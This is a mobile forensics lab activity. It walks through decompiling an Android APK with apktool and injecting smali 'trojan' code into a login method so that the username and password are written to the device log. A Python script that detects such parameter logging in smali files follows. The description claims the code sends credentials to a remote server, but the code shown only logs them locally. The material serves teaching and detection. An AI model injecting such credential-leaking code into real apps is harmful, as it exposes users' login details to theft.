Activity 2 - Mobile Forensics

 

Re-building the APK File

Estimated Time: 30 Minutes

Objective

In Activity 2, the APK file is extracted to a folder and malicious code is injected into one of the files.

Description

After generating a signed APK file in Activity 1, we will extract it into a folder structure and inject malicious code into one of the files. This code will take a copy of the login credentials entered in the app and send them to a remote server unnoticed.

Artifacts

Click the links below to download the files.
login.apk

p9cert.jks

Instructions

  • Step 1: Download the file "apktool_2.0.0rc3.jar" from the link given below. With the help of this jar file, we will extract the "app-release.apk" file created in Activity 1 and view the contents of its files.
  •    https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.0.0rc3.jar

  • Step 2: Place the downloaded file in the same directory as "app-release.apk".

  • Step 3: Open a command prompt and go to the folder where the files "apktool_2.0.0rc3.jar" and "app-release.apk" are present.

  • Step 4: Run the command below to extract the APK file into a folder structure.
  •    java -jar apktool_2.0.0rc3.jar d app-release.apk
       

  • Step 5: Go inside the app-release folder and observe the sub-folders.

  • Step 6: There are several files with the extension ".smali" inside the sub-folder called "smali" under app-release.

  • Step 7: Search for the file "RestClient.smali" and open it in any text editor (for example, Notepad++). Now find the method "performLogin" in the code.

  • Step 8: Add the piece of code below after ".line 258" in the file.

  •    # EVIL TROJAN CODE LOGGING PASSWORD
       const-string v0, "TTUPROJECT"
       const-string v1, "USERNAME AND PASSWORD BELOW"
       invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
       invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
       invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
       # END OF EVIL TROJAN CODE


       

       

  • Step 9: Save the code changes in the "RestClient.smali" file.
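
A forensic check for the modification made in Steps 7 to 9, as an added example that is not part of the original activity: the inserted lines pass the performLogin parameters p3 and p4 to Log.e, so this Python script scans apktool's smali output for Log calls whose message argument is a parameter register. The function names, the sample method signature and the layout of each finding are assumptions made for illustration.

```python
import re
from pathlib import Path

# Any static call into android.util.Log; group 1 = register list, group 2 = Log method.
LOG_CALL = re.compile(r"invoke-static\s*\{([^}]*)\},\s*Landroid/util/Log;->(\w+)\(")
METHOD_START = re.compile(r"^\.method\s.*?([\w$<>]+)\(")

def find_param_logging(smali_text, path="<memory>"):
    """Flag Log.* calls whose message argument is a method parameter register (pN)."""
    # Triage heuristic only: it misses values first copied into a vN register,
    # and it will also flag legitimate debug logging of parameters.
    findings, method = [], None
    for lineno, raw in enumerate(smali_text.splitlines(), 1):
        line = raw.strip()
        start = METHOD_START.match(line)
        if start:
            method = start.group(1)
        elif line.startswith(".end method"):
            method = None
        call = LOG_CALL.search(line)
        if call and method:
            regs = [r.strip() for r in call.group(1).split(",")]
            params = [r for r in regs[1:] if re.fullmatch(r"p\d+", r)]  # regs[0] is the tag
            if params:
                findings.append((path, method, lineno, call.group(2), params))
    return findings

def scan_tree(root):
    """Run the check over every .smali file under an apktool output folder."""
    findings = []
    for path in Path(root).rglob("*.smali"):
        findings += find_param_logging(path.read_text(encoding="utf-8", errors="replace"), str(path))
    return findings

# Constructed sample: the method signature and surrounding lines are hypothetical.
SAMPLE = """\
.method public performLogin(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
    .line 258
    const-string v0, "TTUPROJECT"
    const-string v1, "USERNAME AND PASSWORD BELOW"
    invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    return-void
.end method
"""

if __name__ == "__main__":
    print(find_param_logging(SAMPLE, "RestClient.smali"))
```

Running scan_tree on the app-release folder produced in Step 4 applies the same check to every smali file; each finding gives the file, method, line number, Log method and the parameter registers involved.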

Self-Assessment

Please complete the following self-assessment over Activity 2.